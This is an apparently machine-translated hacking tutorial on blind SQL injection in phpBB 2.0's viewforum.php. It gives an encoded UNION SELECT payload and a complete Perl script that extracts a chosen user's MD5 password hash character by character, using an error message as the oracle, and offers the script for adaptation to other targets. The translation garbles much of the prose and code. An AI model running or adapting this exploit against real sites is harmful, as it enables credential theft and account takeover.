PHP Injection Instance _php Foundation

PHP injection instance on the Internet is difficult to see a complete article about PHP injection and the use of code, so I have been the MySQL and PHP hard chew for a few weeks, the following talk about my recess bar, I hope to be a tip!
I believe that the injection of ASP is already very familiar with, and the injection of PHP is more difficult than the ASP, because the PHP magic_gpc option is really a headache, do not appear in the injection quotes, and PHP is mostly combined with MySQL, and MySQL's functional shortcomings, From another person's point of view to some extent to prevent the SQL Njection attacks, I would like to cite an example here, I take phpbb2.0 as an example:
One of the variables in the viewforum.php is not filtered:
if (Isset ($HTTP _get_vars<post_forum_url]) ││isset ($HTTP _post_vars<post_forum_url))
{
$forum _id = (isset ($HTTP _get_vars<post_forum_url]))? Intval ($HTTP _get_vars<post_forum_url]): intval

($HTTP _post_vars<post_forum_url]);
}
else if (isset ($HTTP _get_vars[' Forum '))
{
$forum _id = $HTTP _get_vars[' Forum '];
}
Else
{
$forum _id = ';
}
This is the forum, and the following directly into the query:
if (!empty ($forum _id))
{
$sql = "SELECT *
From ". Forums_table. "
WHERE forum_id = $forum _id ";
if (!) ( $result = $db->sql_query ($sql)))
{
Message_die (General_error, ' could not obtain forums information ', ', __line__, __file__, $sql);
}
}
Else
{
Message_die (general_message, ' forum_not_exist ');
}

If it is an ASP, I believe many people will inject. If this forum_id specified forum does not exist, it will make $result empty, then return could not obtain forums information information, so the following code can not be carried out.
//
If the query doesn ' t return all rows This isn ' t a valid forum. Inform
The user.
//
if (!) ( $forum _row = $db->sql_fetchrow ($result)))
{
Message_die (general_message, ' forum_not_exist ');
}

//
Start Session Management
//
$userdata = Session_pagestart ($user _ip, $forum _id)/****************************************

The key is the asterisk line, which is a function session_pagestart ($user _ip, $thispage _id), a function defined in session.php, because the code is too

Long, not all posted out, interested can look at, the key is this function also called Session_begin (), the function calls the following Session_begin ($user _id, $user _ip,

$thispage _id, TRUE), is also defined in this file, which has the following code
$sql = "UPDATE". Sessions_table. "
SET session_user_id = $user _id, session_start = $current _time, session_time = $current _time, session_page =

$page _id, session_logged_in = $login
WHERE session_id = ' ". $session _id. "'
and session_ip = ' $user _ip ' ";
if (!) ( $result = $db->sql_query ($sql)) ││! $db->sql_affectedrows ())
{
$session _id = MD5 (uniqid ($user _ip));

$sql = "INSERT into". Sessions_table. "
(session_id, session_user_id, Session_Start, Session_time, Session_ip, Session_page,

SESSION_LOGGED_IN)
VALUES (' $session _id ', $user _id, $current _time, $current _time, ' $user _ip ', $page _id, $login) ";
if (!) ( $result = $db->sql_query ($sql)))
{
Message_die (Critical_error, ' ERROR creating new Session:session_begin ', ', __line__, __file__,

$SQL);
}


Here is a session_page in MySQL defined is a number of plastic, his $page_id, that is, $forum_id, if the insertion is not plastic will be an error, there will be errors

Creating new Session:session_begin, so it's important to refer to the $forum_id value, so I'm going to specify it as: -1%20union%20select% 201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord (SUBSTRING ( user_password,1,1) = 57, no quotes! Although a nonexistent forum_id is specified, the result of the query returned by him is not necessarily null, and this is the ASCII value of the first password of the user guessing user_id 2 is 57, If it is, then the first paragraph of the article in the code of the $result is not empty, so the implementation of the Ession_pagestart this problematic function, the inserted is not a whole number of course will be wrong, and then show the error creating new Session:session _begin, that means you guessed the first one, and the other bit is similar.

Without this error message, I think it's hard to tell if it's successful even if it's injected. It seems that the error message is also helpful. The analysis is here, attached a section of the test code, this code as long as a little modification can be applied to other similar guessing MD5 password, here I use the English version of the return conditions, In Chinese and other languages, just change the return conditions.

Use Http::request::common;
Use Http::response;
Use lwp::useragent;
$ua = new Lwp::useragent;

print "***********************n";
Print "phpBB viewforum.php expn";
Print "Code by PINKEYESN";
print "Www.icehack.comn";
print "************************n";
Print "Please enter the weak file ' s url:n";
print "e.g. HTTP://192.168.1.4/PHPBB2/VIEWFORUM.PHPN";
$adr =<stdin>;
Chomp ($ADR);
print ' Please enter the user_id ' you want to crackn ';
$u =<stdin>;
Chomp ($u);
Print "Work Starting,please wait!n";
@pink = (48..57);
@pink = (@pink, 97..102);
For ($j =1 $j <=32; $j + +) {
for ($i =0; $i < @pink; $i + +) {
$url = $adr. "? Forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%

20user_id= $u%20and%20ord (substring (User_password, $j, 1)) = $pink [$i] ";
$request = http::request->new (' Get ', ' $url ');
$response = $ua->request ($request);

if ($response->is_success) {
if ($response->content =~/error Creating new session/) {
$pwd. =CHR ($pink [$i]);
print "$PWDN";
}

}
}
}
if ($pwd ne "") {
Print "Successfully,the password is $pwd, good luckn";}
else{
Print "Bad Luck,work failed!n";}

As for the recent phpbb2.0.6 search.php problem using the program as long as the code slightly modified on the line, if you want to make a mistake please www.icehack.com correct.